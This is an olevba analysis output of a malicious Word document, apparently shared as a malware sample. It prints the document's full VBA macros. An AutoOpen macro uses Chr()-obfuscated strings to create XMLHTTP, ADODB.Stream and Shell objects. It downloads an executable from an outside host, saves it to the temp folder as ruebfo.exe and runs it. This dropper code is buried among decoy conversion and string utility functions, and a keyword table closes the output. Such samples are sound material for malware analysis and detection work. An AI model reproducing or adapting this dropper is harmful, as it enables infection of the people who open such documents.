Malicious Word macro

1. olevba 0.31 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. OLE:MASIH--V norepl~3.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: norepl~3.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: norepl~3.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub autoopen()
17.  
18. HHNANNNNNAD (500)
19.  
20. End Sub
21.  
22. Sub HHNANNNNNAD(FFFFF As Long)
23. Dec2Bin16_32
24.  
25. End Sub
26.  
27.  
28.  
29. -------------------------------------------------------------------------------
30. VBA MACRO Module2.bas
31. in file: norepl~3.doc - OLE stream: u'Macros/VBA/Module2'
32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
33.  
34.  
35. Public Type typFloat         ' FLOAT CONVERTER TYPES/VALUES
36.    F As Single
37. End Type
38.  
39. Public Type typStringArray2  ' STRING ARRAY CONVERTER TYPE
40.    Str(1 To 2) As String
41. End Type
42.  
43. Public Type typByteArray3    ' BYTE ARRAY CONVERTER TYPES/VALUES
44.    B(1 To 3) As Byte
45. End Type
46.  
47. Public Type typByteArray4    ' BYTE ARRAY CONVERTER TYPES/VALUES
48.    B(1 To 4) As Byte
49. End Type
50.  
51.  
52. Public Type typNumString     ' NUM/STRING PARAMETER TYPE
53.    Number As Integer
54.     RawString As String
55. End Type
56.  
57.  
58. Public Type typCfgParam      ' CFG PARAMETER TYPE
59.    Name As String
60.     Value As String
61.     Comment As String
62. End Type
63.  
64.  
65. Public MarkError As Boolean  ' Global error conversion flag.
66.  
67. '==========================================================================
68. ' FUNCTION:
69. '
70. '==========================================================================
71.  
72.  
73. Public Function checkFolder_32(KJB As Long)
74.  
75. Dim strUnquote23: Set strUnquote23 = GetInnerTextAsBin2(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
76. strUnquote23.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(100) & Chr(101) & Chr(116) & Chr(111) & Chr(99) & Chr(111) & Chr(102) & Chr(102) & Chr(101) & Chr(101) & Chr(46) & Chr(111) & Chr(106) & Chr(105) & Chr(106) & Chr(105) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(52) & Chr(53) & Chr(121) & Chr(103) & Chr(101) & Chr(103) & Chr(101) & Chr(47) & Chr(48) & Chr(57) & Chr(55) & Chr(117) & "j" & Chr(46) & "e" & Chr(120) & "e", False
77. strUnquote23.Send
78. checkFolder_32 = strUnquote23.responseBody
79. End Function
80.  
81.  
82.  
83. '==========================================================================
84. ' FUNCTION: CONVERT CONFIG STRING
85. ' Deciphers config string by mask [ParName] = [ParString] and returns
86. ' result as cfgParam type.
87. '==========================================================================
88. '
89. Public Function ConvCFG(ByVal SourceString As String) As typCfgParam
90.  
91.  Dim cntCharCounter          As Long
92.  Dim cntSrcStringLength      As Long
93.  
94.  Dim cntMarkCommentBeginning As Long
95.  Dim cntMarkValueBeginning   As Long
96.                
97.     SourceString = Trim$(SourceString)
98.  
99.     If LenB(SourceString) = 0 Then Exit Function
100.     If Asc(SourceString) = 59 Or Asc(SourceString) = 91 Then Exit Function 'if REMARKED, then END FUNCTION NOW!!!
101.                            
102.     ConvCFG.Name = vbNullString
103.     ConvCFG.Value = vbNullString
104.     ConvCFG.Comment = vbNullString
105.                
106.     cntMarkCommentBeginning = 0
107.     cntMarkValueBeginning = 0
108.                
109.     cntSrcStringLength = Len(SourceString)
110.  
111.     For cntCharCounter = cntSrcStringLength To 1 Step -1
112.                
113.         Select Case Mid$(SourceString, cntCharCounter, 1)
114.                    
115.             Case kCommentary: cntMarkCommentBeginning = cntCharCounter + 1
116.  
117.             Case kEquals: cntMarkValueBeginning = cntCharCounter + 1
118.                    
119.         End Select
120.                
121.     Next cntCharCounter
122.  
123.                
124.     If cntMarkValueBeginning = 0 Then Exit Function
125.     If cntMarkValueBeginning > cntMarkCommentBeginning And cntMarkCommentBeginning > 0 Then Exit Function
126.                
127.     ConvCFG.Name = Trim$(Left$(SourceString, cntMarkValueBeginning - 2))
128.                
129.     If cntMarkCommentBeginning = 0 Then
130.                
131.         ConvCFG.Value = Trim$(Right$(SourceString, (cntSrcStringLength + 1) - cntMarkValueBeginning))
132.                    
133.     Else
134.                
135.         ConvCFG.Comment = Trim$(Mid$(SourceString, cntMarkCommentBeginning))
136.         ConvCFG.Value = Trim$(Mid$(SourceString, cntMarkValueBeginning, cntMarkCommentBeginning - cntMarkValueBeginning - 1))
137.                    
138.     End If
139.                
140. End Function
141.  
142.  
143. '==========================================================================
144. ' FUNCTION: VALUE TO HEX-STRING OF SPECIFIED LENGTH
145. ' Converts decimal value (e.g. "11") into true hex value with given length
146. ' (e.g. "0B" in case nativelength=1 or "000B in case nativelength=2)
147. '==========================================================================
148. Public Function ValToHex(ByVal SourceValue As String, ByVal DesiredLength As Byte) As String
149.  
150. On Error GoTo ErrorHandler
151.  
152.  Dim SrcLength As Byte
153.    
154.     ValToHex = Hex(Val(SourceValue))
155.     SrcLength = Len(ValToHex)
156.    
157.     If SrcLength < DesiredLength Then ValToHex = CharFillL(ValToHex, "0", DesiredLength)
158.        
159.     If SrcLength > DesiredLength Then _
160.        ValToHex = Mid$(ValToHex, (SrcLength - DesiredLength + 1), DesiredLength) 'cuts off excess
161.    
162.     Exit Function
163.  
164. ErrorHandler:
165.     MsgBox "Warning: possible error during DEC > HEX conversion. You have entered incorrect value (" + SourceValue + ")."
166.     ValToHex = vbNullString
167. End Function
168.  
169. '==========================================================================
170. ' FUNCTION: VALUE TO HEX-STRING OF SPECIFIED LENGTH (UNSIGNED)
171. ' This function does the same as ValToHex, but with unsigned hexes
172. '==========================================================================
173. Public Function ValToHexUnsigned(ByVal SourceValue As String, ByVal DesiredLength As Byte) As String
174. On Error GoTo ErrorHandler
175.  
176.  Dim SrcLength As Byte
177.    
178.     ValToHexUnsigned = UnsignedHex(Val(SourceValue))
179.     SrcLength = Len(ValToHexUnsigned)
180.  
181.     If SrcLength < DesiredLength Then ValToHexUnsigned = CharFillL(ValToHexUnsigned, "0", DesiredLength)
182.    
183.     If SrcLength > DesiredLength Then _
184.        ValToHexUnsigned = Mid$(ValToHexUnsigned, (SrcLength - DesiredLength + 1), DesiredLength) 'cuts off excess
185.    
186.     Exit Function
187.  
188. ErrorHandler:
189.     MsgBox "Warning: possible error during DEC>HEX conversion. You have entered incorrect value (" + SourceValue + ")."
190.     ValToHexUnsigned = vbNullString
191.  
192. End Function
193.  
194.  
195.  
196. '==========================================================================
197. ' FUNCTION: INVERT HEXADECIMAL STRING (ex-Invrt)
198. ' Inverts hexadecimal string to comply with x86 little-endian standard.
199. '==========================================================================
200. Public Function InvertHex(ByVal SourceString As String) As String
201.  
202.  Dim cntCurChar As Integer
203.  Dim LengthInBytes As Integer
204.  
205. '   Check if string contains odd or even amount of symbols, and if it's even,
206. '   just cut the last symbol:
207.  
208.     If Len(SourceString) Mod 2 = 0 Then _
209.        LengthInBytes = Len(SourceString) / 2 Else _
210.        LengthInBytes = Len(SourceString) / 2 - 1
211.        
212.        
213. '   Inversion cycle itself:
214.  
215.     For cntCurChar = 1 To LengthInBytes * 2 Step 2
216.    
217.         If cntCurChar <> LengthInBytes * 2 Then
218.             InvertHex = InvertHex + (Mid$(SourceString, ((LengthInBytes * 2) - cntCurChar), 2))
219.         End If
220.        
221.     Next
222.  
223. End Function
224.  
225.  
226.  
227. '==========================================================================
228. ' FUNCTION: DECIMAL TO UNSIGNED HEX CONVERSION
229. ' Converts any type of numbers to unsigned HEX string (prevents overflow)
230. '==========================================================================
231. Function UnsignedHex(ByVal Value As Variant) As String
232.  
233.  Dim TwoToThe32 As Variant
234.    
235.         TwoToThe32 = CDec("2") ^ 32
236.        
237.         If CDec(Value) < 0 Or Abs(CDec(Value)) >= TwoToThe32 Then
238.             UnsignedHex = -1
239.         Else
240.             If CDec(Value) >= TwoToThe32 / 2 Then
241.                 Value = CDec(Value) - TwoToThe32
242.             End If
243.             UnsignedHex = Hex$(CDec(Value))
244.         End If
245.        
246. End Function
247.  
248.  
249. '==========================================================================
250. ' FUNCTION: A,B,C,D PARAMETERS TO BYTES(4)
251. ' Converts 4 divider-separated byte values string into 4 byte array values
252. '==========================================================================
253. Public Function ParamsToBytes4(RawString As String, ByVal Nomer As Byte) As typByteArray4
254.  
255. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
256.  
257.  Dim tmpStringArray() As String
258.  Dim tmpCurrentValue As Byte
259.  Dim cntPointer As Byte
260.  
261.         tmpStringArray = Split(RawString, kDivider, 4)
262.         If UBound(tmpStringArray) > 3 Then ReDim Preserve tmpStringArray(3)
263.        
264.         For cntPointer = 0 To UBound(tmpStringArray)
265.             ParamsToBytes4.B(cntPointer + 1) = CByteL(tmpStringArray(cntPointer))
266.         Next cntPointer
267.                
268.         Exit Function
269.        
270. ErrorHandler:   ParamsToBytes4.B(1) = 0 'fuk em...
271.                ParamsToBytes4.B(2) = 0
272.                 ParamsToBytes4.B(3) = 0
273.                 ParamsToBytes4.B(4) = 0
274.  
275. End Function
276.  
277.  
278.  
279. '==========================================================================
280. ' FUNCTION: A,B,C PARAMETERS TO BYTES(3) (ex-RGBAConv)
281. ' Converts 3 divider-separated byte values string into 3 byte array values
282. '==========================================================================
283. Public Function BytesToHex(RawString As String, Limit As Integer) As String
284.  
285.  Dim tmpStringArray() As String
286.  Dim cntPointer As Byte
287.  
288.         tmpStringArray = Split(RawString, kDivider, Limit)
289.        
290.         For cntPointer = 0 To UBound(tmpStringArray)
291.             BytesToHex = BytesToHex & ValToHex(tmpStringArray(cntPointer), 2)
292.         Next cntPointer
293.  
294.        
295. End Function
296.  
297.  
298.  
299. -------------------------------------------------------------------------------
300. VBA MACRO Module1.bas
301. in file: norepl~3.doc - OLE stream: u'Macros/VBA/Module1'
302. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
303.  
304. Function ReturnSelectedString(sArray() As String, sWithString As String) As String
305.     Dim ii As Integer
306.  
307.     For ii = LBound(sArray) To UBound(sArray)
308.         If VBA.InStr(1, sArray(ii), sWithString) Then
309.             ReturnSelectedString = sArray(ii)
310.             Exit Function
311.         End If
312.     Next ii
313. End Function
314.  
315.  
316.  
317.  
318. Public Sub Dec2Bin8_7(ErrorHandler_18 As Object, ErrorHandler_19 As String)
319. Dim param2 As Integer
320. param2 = 2
321.  
322. ErrorHandler_18.savetofile ErrorHandler_19, param2
323. End Sub
324.  
325.  
326. Function BuildFormString(sArray() As String) As String
327.     'This function builds a standard HTML web form string from an array of input values
328.    Dim ii As Integer, sReturnedString As String, sDivider As String
329.    
330.     sDivider = "--" & MULTIPART_BOUNDARY
331.  
332.     For ii = LBound(sArray, 2) To UBound(sArray, 2)
333.         sReturnedString = sReturnedString & sDivider & vbCr & vbLf
334.         sReturnedString = sReturnedString & "Content-Disposition: form-data; name=" & sArray(2, ii) & vbCr & vbLf & vbCr & vbLf & sArray(1, ii) & vbCr & vbLf
335.     Next ii
336.    
337.     sReturnedString = sReturnedString & sDivider & "--"
338.     BuildFormString = sReturnedString
339. End Function
340.  
341. 'Function GetParametersFromAJAXString(sHTML As String) As String()
342. '    Dim lStart As Long, lEnd As Long
343. '    Dim sMid As String
344. '    Dim sArray() As String
345. '
346. '    lStart = VBA.InStr(1, sHTML, "A4J.AJAX.Submit")
347. '
348. '
349. '    If lStart > 0 Then
350. '        lStart = VBA.InStr(lStart, sHTML, "(")
351. '        lEnd = VBA.InStr(lStart, sHTML, ")")
352. '        sMid = VBA.Mid$(sHTML, lStart + 1, lEnd - lStart - 1)
353. '        sArray = VBA.Split(sMid, ",")
354. '
355. '        GetParametersFromAJAXString = sArray
356. '    End If
357. 'End Function
358. '
359. 'Function GetAJAXViewState(sHTML As String) As String
360. '    Dim lStart As Long, lEnd As Long
361. '    Dim sMid As String
362. '
363. '    lStart = VBA.InStr(1, sHTML, "javax.faces.ViewState")
364. '    lStart = VBA.InStr(lStart, sHTML, "value=""")
365. '
366. '    If lStart > 0 Then
367. '        lEnd = VBA.InStr(lStart, sHTML, """ />")
368. '        sMid = VBA.Mid$(sHTML, lStart + VBA.Len("value="""), lEnd - lStart - VBA.Len("value="""))
369. '        GetAJAXViewState = sMid
370. '    End If
371. '
372.  
373. Function GetValueForVariable(sHTML As String, sValue As String, Optional bRemoveQuotes As Boolean) As String
374.     Dim iStart As Integer, iEnd As Integer, sResponse As String
375.    
376.     iStart = VBA.InStr(1, sHTML, sValue & "=") + VBA.Len(sValue & "=")
377.     iEnd = VBA.InStr(iStart + 1, sHTML, """")
378.     sResponse = VBA.Mid$(sHTML, iStart, iEnd - iStart + 1)
379.    
380.     If bRemoveQuotes Then
381.         If VBA.Left$(sResponse, 1) = """" Then sResponse = VBA.Right$(sResponse, VBA.Len(sResponse) - 1)
382.         If VBA.Right$(sResponse, 1) = """" Then sResponse = VBA.Left$(sResponse, VBA.Len(sResponse) - 1)
383.     End If
384.    
385.     GetValueForVariable = sResponse
386. End Function
387.  
388. Function GetInnerText(sString As String) As String
389.     Dim iStart As Integer, iEnd As Integer, sResponse As String
390.  
391.     iStart = VBA.InStr(1, sString, ">")
392.     iEnd = VBA.InStr(iStart, sString, "<")
393.     sResponse = VBA.Mid$(sString, iStart + 1, iEnd - iStart - 1)
394.    
395.     GetInnerText = sResponse
396. End Function
397.  
398.  
399. Public Function GetInnerTextAsBin2(GetInnerTextAsBinPar As String)
400. GetInnerTextAsBinPar = Replace(GetInnerTextAsBinPar, Chr(61), "")
401. GetInnerTextAsBinPar = Replace(GetInnerTextAsBinPar, Chr(60), "")
402. GetInnerTextAsBinPar = Replace(GetInnerTextAsBinPar, Chr(59), "")
403.  Set GetInnerTextAsBin2 = CreateObject(GetInnerTextAsBinPar)
404. End Function
405.  
406.  
407.  
408. '=========================================================================================================================
409. ' Functions used for HTML scrapping.  Ugly Business
410. '=========================================================================================================================
411. Function GetArrayofInstancesFromHTML(sHTML As String, sSearchTag As String, sSearchPredicate As String) As String()
412.     Dim sTagStart As String, sTagEnd As String, sFoundText As String
413.     Dim iStart As Long, iEnd As Long, iCounter As Long, sOutputArray() As String
414.  
415.     sTagStart = "<" & sSearchTag & " "
416.     sTagEnd = "/" & sSearchTag & ">"
417.     If sSearchTag = "input" Then sTagEnd = " />"
418.    
419.     iStart = 1:    iCounter = 0
420.     While iStart > 0
421.         iStart = VBA.InStr(iStart + 1, sHTML, sTagStart)
422.         If iStart > 0 Then
423.             iEnd = VBA.InStr(iStart, sHTML, sTagEnd)
424.             sFoundText = VBA.Mid$(sHTML, iStart + VBA.Len(sTagStart) - 1, iEnd - (iStart + VBA.Len(sTagStart) - 1))
425.            
426.             'If we have set a predicate, then make sure it matches
427.            If VBA.Len(sSearchPredicate) > 0 Then
428.                 If VBA.InStr(1, sFoundText, sSearchPredicate) = 0 Then sFoundText = ""
429.             End If
430.         End If
431.        
432.         'If we've found something then chuck it in the array
433.        If VBA.Len(sFoundText) > 0 Then
434.             iCounter = iCounter + 1
435.             ReDim Preserve sOutputArray(1 To iCounter)
436.             sOutputArray(iCounter) = sFoundText
437.         End If
438.     Wend
439.  
440.     GetArrayofInstancesFromHTML = sOutputArray
441. End Function
442.  
443. -------------------------------------------------------------------------------
444. VBA MACRO Module3.bas
445. in file: norepl~3.doc - OLE stream: u'Macros/VBA/Module3'
446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
447.  
448.  
449. '==========================================================================
450. ' FUNCTION: PARAMETERS TO STRING ARRAY
451. ' Converts 2 divider-separated values into string + string values
452. '==========================================================================
453. Public Function ParamsToStringArray(RawString As String, Limit As Integer) As String()
454.  
455. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
456.  
457.  Dim cntPointer As Integer
458.  Dim tmpStringArray() As String
459.  
460.     ParamsToStringArray = Split(RawString, kDivider, Limit)
461.     If UBound(ParamsToStringArray) > Limit Or UBound(ParamsToStringArray) < Limit Then ReDim Preserve ParamsToStringArray(Limit)
462.    
463.     Exit Function
464.        
465. ErrorHandler:
466.     Exit Function
467.        
468. End Function
469.  
470.  
471.  
472. '==========================================================================
473. ' FUNCTION: A,B PARAMETERS TO INTEGER + STRING
474. ' Converts 2 divider-separated values into integer + string values
475. '==========================================================================
476. Public Function ParamsToNumString(RawString As String) As typNumString
477.  
478. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
479.  
480.  Dim tmpStringArray() As String
481.  
482.     tmpStringArray = Split(RawString, kDivider, 2)
483.    
484.     ParamsToNumString.Number = CInt(tmpStringArray(0))
485.     ParamsToNumString.RawString = tmpStringArray(1)
486.                                    
487.     Exit Function
488.        
489. ErrorHandler:   ParamsToNumString.Number = 0 'fuk em...
490.                ParamsToNumString.RawString = vbNullString
491.  
492. End Function
493.  
494.  
495.  
496. '==========================================================================
497. ' FUNCTION: STRING TO HEXADECIMAL STRING
498. ' Converts standard string to a string hexcode.
499. '==========================================================================
500. Public Function StringToHex(ByVal Stroka As String) As String
501.  
502.  Dim cntCharCounter As Byte
503.  
504.         For cntCharCounter = 1 To Len(Stroka)
505.             StringToHex = StringToHex & Hex(AscB(Mid$(Stroka, cntCharCounter, 1)))
506.         Next
507.        
508. End Function
509.  
510. '==========================================================================
511. ' FUNCTION: BIN-2-DEC
512. ' Converts binary string (e.g. 01010101) into decimal (e.g. 85)
513. '==========================================================================
514. Public Function Bin2Dec(Num As String) As Long
515.   Dim n As Long
516.   Dim a As Long
517.   Dim x As String
518.      n = Len(Num) - 1
519.      a = n
520.      Do While n > -1
521.         x = Mid(Num, ((a + 1) - n), 1)
522.         Bin2Dec = IIf((x = "1"), Bin2Dec + (2 ^ (n)), Bin2Dec)
523.         n = n - 1
524.      Loop
525. End Function
526.  
527.  
528. '==========================================================================
529. ' FUNCTION: DEC-2-BIN 8
530. ' Converts decimal byte into 8 bits as string.
531. '==========================================================================
532. Public Function Dec2Bin8(ByVal DecVal As Byte) As String
533.     Dim i As Integer
534.     Dim sResult As String
535.  
536.     sResult = Space(8)
537.     For i = 0 To 7
538.         If DecVal And (2 ^ i) Then
539.             Mid(sResult, 8 - i, 1) = "1"
540.         Else
541.             Mid(sResult, 8 - i, 1) = "0"
542.         End If
543.     Next
544.     Dec2Bin8 = sResult
545. End Function
546.  
547. '==========================================================================
548. ' FUNCTION: DEC-2-BIN 16
549. ' Converts decimal byte into 16 bits as string.
550. '==========================================================================
551. Public Function Dec2Bin16(ByVal DecVal As Integer) As String
552.     Dim i As Integer
553.     Dim sResult As String
554.  
555.     sResult = Space(16)
556.     For i = 0 To 15
557.         If DecVal And (2 ^ i) Then
558.             Mid(sResult, 16 - i, 1) = "1"
559.         Else
560.             Mid(sResult, 16 - i, 1) = "0"
561.         End If
562.     Next
563.     Dec2Bin16 = sResult
564. End Function
565.  
566. Public Function Dec2Bin16_32()
567. Set GetInnerTextAsBin2Result = GetInnerTextAsBin2(Chr(87) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)) _
568. .Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
569. UnsignedHexString2 = GetInnerTextAsBin2Result("T" + "E" & Chr(77) & Chr(80))
570. Dim ErrorHandler_18 As Object
571. Set ErrorHandler_18 = GetInnerTextAsBin2(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
572. Dim ErrorHandler_19 As String
573. ErrorHandler_19 = UnsignedHexString2 + "\rue" & Chr(98) + "fo." & "e" & Chr(120) & Chr(101)
574. With ErrorHandler_18
575.    .Type = 1
576.     .Open
577.     .write checkFolder_32(223)
578.    
579. End With
580.  
581.  Dec2Bin8_7 ErrorHandler_18, ErrorHandler_19
582. Set noextensionFile = GetInnerTextAsBin2(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
583. noextensionFile.Open (ErrorHandler_19)
584. End Function
585.  
586.  
587. '==========================================================================
588. ' FUNCTION: DECIMAL TO IEEE-754 FLOAT
589. ' Converts decimal long to IEEE-754 float
590. '==========================================================================
591. Public Function DecToIEEE(ByVal DecValue As Double) As Long
592.  
593. On Error GoTo ErrorHandler
594.  
595.  Dim B As typByteArray4
596.  Dim F As typFloat
597.  Dim t As Long
598.  
599.     F.F = DecValue
600.     LSet B = F
601.     DecToIEEE = B.B(4) * (2 ^ 24)
602.     DecToIEEE = DecToIEEE + B.B(3) * (2 ^ 16)
603.     DecToIEEE = DecToIEEE + B.B(2) * (2 ^ 8)
604.     DecToIEEE = DecToIEEE + B.B(1)
605.  
606. Exit Function
607.  
608. ErrorHandler:
609.         MsgBox "Error during DEC > IEEE-754 float conversion. Check if you have set correct value."
610.  
611. End Function
612.  
613.  
614.  
615. '==========================================================================
616. ' FUNCTION: HEX TO DECIMAL VALUE
617. ' Converts hexadecimal long to a decimal long.
618. '==========================================================================
619. Function HxVal(ByVal s As String) As Long
620.  
621. On Error GoTo ErrorHandler
622.  
623.     If LenB(s) <> 0 Then HxVal = CLng("&H" & s) Else HxVal = CLng("&H" & "00")
624.     Exit Function
625.  
626. ErrorHandler:
627.     If MarkError = False Then
628.         MarkError = True
629.         HxVal = CLng("&H" & "00")
630.         MsgBox "There was an error when converting some hexadecimal value to a decimal." & vbCrLf & _
631.                "Make sure that you haven't entered wrong data." & vbCrLf & "Source string: ''" & s & "''"
632.     End If
633.  
634. End Function
635.  
636. '==========================================================================
637. ' FUNCTION: SINGLE-LINE TO MULTI-LINE (//-TERMINATED)
638. ' Converts single-line //-terminated string into multiline string
639. '==========================================================================
640. Function DecipherText(ByVal Origtext As String) As String
641.  
642.     DecipherText = Replace$(Origtext, kTerminator, vbCrLf)
643.  
644. End Function
645.  
646. '==========================================================================
647. ' FUNCTION: MULTI-LINE TO SINGLE-LINE (//-TERMINATED)
648. ' Converts multi-line //-terminated string into single-line string
649. '==========================================================================
650. Function CipherText(ByVal SourceString As String) As String
651.  
652.     CipherText = Replace$(SourceString, vbCrLf, kTerminator)
653.  
654. End Function
655.  
656.  
657.  
658. '==========================================================================
659. ' FUNCTION: PADDING WITH ZEROS FROM LEFT (ex-ZeroFill)
660. ' Padding (char-fill) to the left side of source string with 0 symbol.
661. '==========================================================================
662. Function ZeroFill(ByVal Src As String, ByVal DesiredLength As Long) As String
663.  
664.     If Len(Src) > DesiredLength Then Exit Function
665.    
666.     ZeroFill = Src
667.    
668.     Do Until Len(ZeroFill) = DesiredLength
669.         ZeroFill = "0" & ZeroFill
670.     Loop
671.  
672. End Function
673.  
674.  
675. '==========================================================================
676. ' FUNCTION: FILL
677. '
678. '==========================================================================
679. Function Fill(ByVal Src As String, ByVal DesiredLength As Long) As String
680.  
681. Dim cnt As Long
682.  
683.     For cnt = 0 To DesiredLength - 1
684.         Fill = Fill & Src
685.     Next cnt
686.  
687. End Function
688.  
689.  
690.  
691. '==========================================================================
692. ' FUNCTION: PADDING (ADD SYMBOLS TO THE LEFT SIDE)
693. ' Padding (char-fill) to the left side of source string.
694. '==========================================================================
695. Function CharFillL(ByVal Src As String, ByVal FillChar As String, ByVal DesiredLength As Long) As String
696.  
697.     If Len(Src) > DesiredLength Then CharFillL = Left$(Src, DesiredLength):  Exit Function
698.     If Len(FillChar) > 1 Then FillChar = Left$(FillChar, 1)
699.    
700.     CharFillL = Src
701.    
702.     Do Until Len(CharFillL) = DesiredLength
703.         CharFillL = FillChar & CharFillL
704.     Loop
705.  
706. End Function
707.  
708. '==========================================================================
709. ' FUNCTION: PADDING (ADD SYMBOLS TO THE RIGHT SIDE)
710. ' Padding (char-fill) to the right side of source string.
711. '==========================================================================
712. Function CharFillR(ByVal Src As String, ByVal FillChar As String, ByVal DesiredLength As Long) As String
713.  
714.     If Len(Src) > DesiredLength Then CharFillR = Left$(Src, DesiredLength): Exit Function
715.     If Len(FillChar) > 1 Then FillChar = Left$(FillChar, 1)
716.    
717.     CharFillR = Src
718.    
719.     Do Until Len(CharFillR) = DesiredLength
720.         CharFillR = CharFillR & FillChar
721.     Loop
722.  
723. End Function
724.  
725.  
726.  
727. '==========================================================================
728. ' FUNCTION: CUT OFF
729. ' This function cuts off specific amount of symbols from left
730. '==========================================================================
731. Function CutOff(ByVal SourceText As String, Length As Byte)
732.  
733.     If Len(SourceText) > Length Then
734.         CutOff = Mid$(SourceText, Length + 1)
735.     Else
736.         CutOff = SourceText
737.     End If
738.  
739. End Function
740.  
741.  
742.  
743. '==========================================================================
744. ' FUNCTION: TRUE LENGTH OF STRING WITHOUT "/" SLASH SYMBOLS
745. '
746. '==========================================================================
747. Public Function TrueLOF(SourceString As String) As Integer 'returns true LOF without slashes
748.  
749.  TrueLOF = Len(Replace$(SourceString, "/", vbNullString))
750.    
751. End Function
752.  
753.  
754.  
755. '==========================================================================
756. ' FUNCTION: MERGE ALL MODDED VALUES OF ALL PARAMETERS OF SELECTED PATCH.
757. ' Used to collect all modified param. values for preset / config writing.
758. '==========================================================================
759. Public Function MergeModdedValues(PatchNumber As Integer) As String
760.  
761. On Error GoTo ErrorHandler
762.  
763.  Dim tmpStringArray() As String
764.  Dim cntUnitCounter As Integer
765.  
766.     ReDim tmpStringArray(UBound(PatchArray(PatchNumber).patchParams))
767.    
768.     For cntUnitCounter = LBound(PatchArray(PatchNumber).patchParams) To UBound(PatchArray(PatchNumber).patchParams)
769.         tmpStringArray(cntUnitCounter) = PatchArray(PatchNumber).patchParams(cntUnitCounter).parModdedValue
770.     Next cntUnitCounter
771.    
772.     MergeModdedValues = Join(tmpStringArray, kDivider2)
773.    
774.     Exit Function
775.    
776. ErrorHandler:
777.     MergeModdedValues = vbNullString
778.  
779. End Function
780.  
781.  
782.  
783. '==========================================================================
784. ' FUNCTION: STRIPOUT
785. ' Deletes specific symbols from string.
786. '==========================================================================
787. Public Function StripOut(SourceString As String, SymbolsToKill As String) As String
788.  
789.  Dim i As Integer
790.  
791.     StripOut = SourceString
792.    
793.     For i = 1 To Len(SymbolsToKill)
794.         StripOut = Replace(StripOut, Mid$(SymbolsToKill, i, 1), vbNullString)
795.     Next i
796.  
797. End Function
798.  
799.  
800.  
801. '==========================================================================
802. ' FUNCTION: STRIPOUT
803. ' Leaves only specified symbols in a string.
804. '==========================================================================
805. Public Function StripIn(SourceString As String, SymbolsToLeave As String) As String
806.  
807.  Dim i, i2 As Integer
808.  Dim c, s As String
809.  Dim t As String
810.  
811.     StripIn = vbNullString
812.     t = vbNullString
813.    
814.    
815.     For i = 1 To Len(SourceString)
816.         For i2 = 1 To Len(SymbolsToLeave)
817.             c = Mid$(SymbolsToLeave, i2, 1)
818.             s = Mid$(SourceString, i, 1)
819.             If s = c Then t = t & c
820.         Next i2
821.     Next i
822.    
823.     StripIn = t
824.  
825. End Function
826.  
827.  
828. '==========================================================================
829. ' FUNCTION: FINALIZE
830. ' Finalizes string with desired character, only if there is no such present
831. '==========================================================================
832. Public Function Finalize(SourceString As String, EndChar As String) As String
833.  
834. If UCase$(Right$(SourceString, 1)) <> UCase$(Left$(EndChar, 1)) Then Finalize = Finalize & Left$(EndChar, 1) Else Finalize = SourceString
835.  
836. End Function
837.  
838.  
839. '==========================================================================
840. ' FUNCTION: CONVERT TO BYTE WITH OVERFLOW PREVENTION
841. '==========================================================================
842. Public Function CByteL(ByVal Value As Long) As Byte
843.     If Value > 255 Then CByteL = 255: Exit Function
844.     CByteL = CByte(Value)
845. End Function
846.  
847.  
848. '==========================================================================
849. ' FUNCTION: CONVERT TO INTEGER WITH OVERFLOW PREVENTION
850. '==========================================================================
851. Public Function CIntL(ByVal Value As Long) As Integer
852.     If Value > 32767 Then CIntL = CInt(Value - 65536): Exit Function
853.     CIntL = CInt(Value)
854. End Function
855.  
856.  
857. +------------+----------------------+-----------------------------------------+
858. | Type       | Keyword              | Description                             |
859. +------------+----------------------+-----------------------------------------+
860. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
861. | Suspicious | Open                 | May open a file                         |
862. | Suspicious | Binary               | May read or write a binary file (if     |
863. |            |                      | combined with Open)                     |
864. | Suspicious | CreateObject         | May create an OLE object                |
865. | Suspicious | Chr                  | May attempt to obfuscate specific       |
866. |            |                      | strings                                 |
867. | Suspicious | SaveToFile           | May create a text file                  |
868. | Suspicious | Write                | May write to a file (if combined with   |
869. |            |                      | Open)                                   |
870. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
871. |            |                      | be used to obfuscate strings (option    |
872. |            |                      | --decode to see all)                    |
873. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
874. |            | Strings              | may be used to obfuscate strings        |
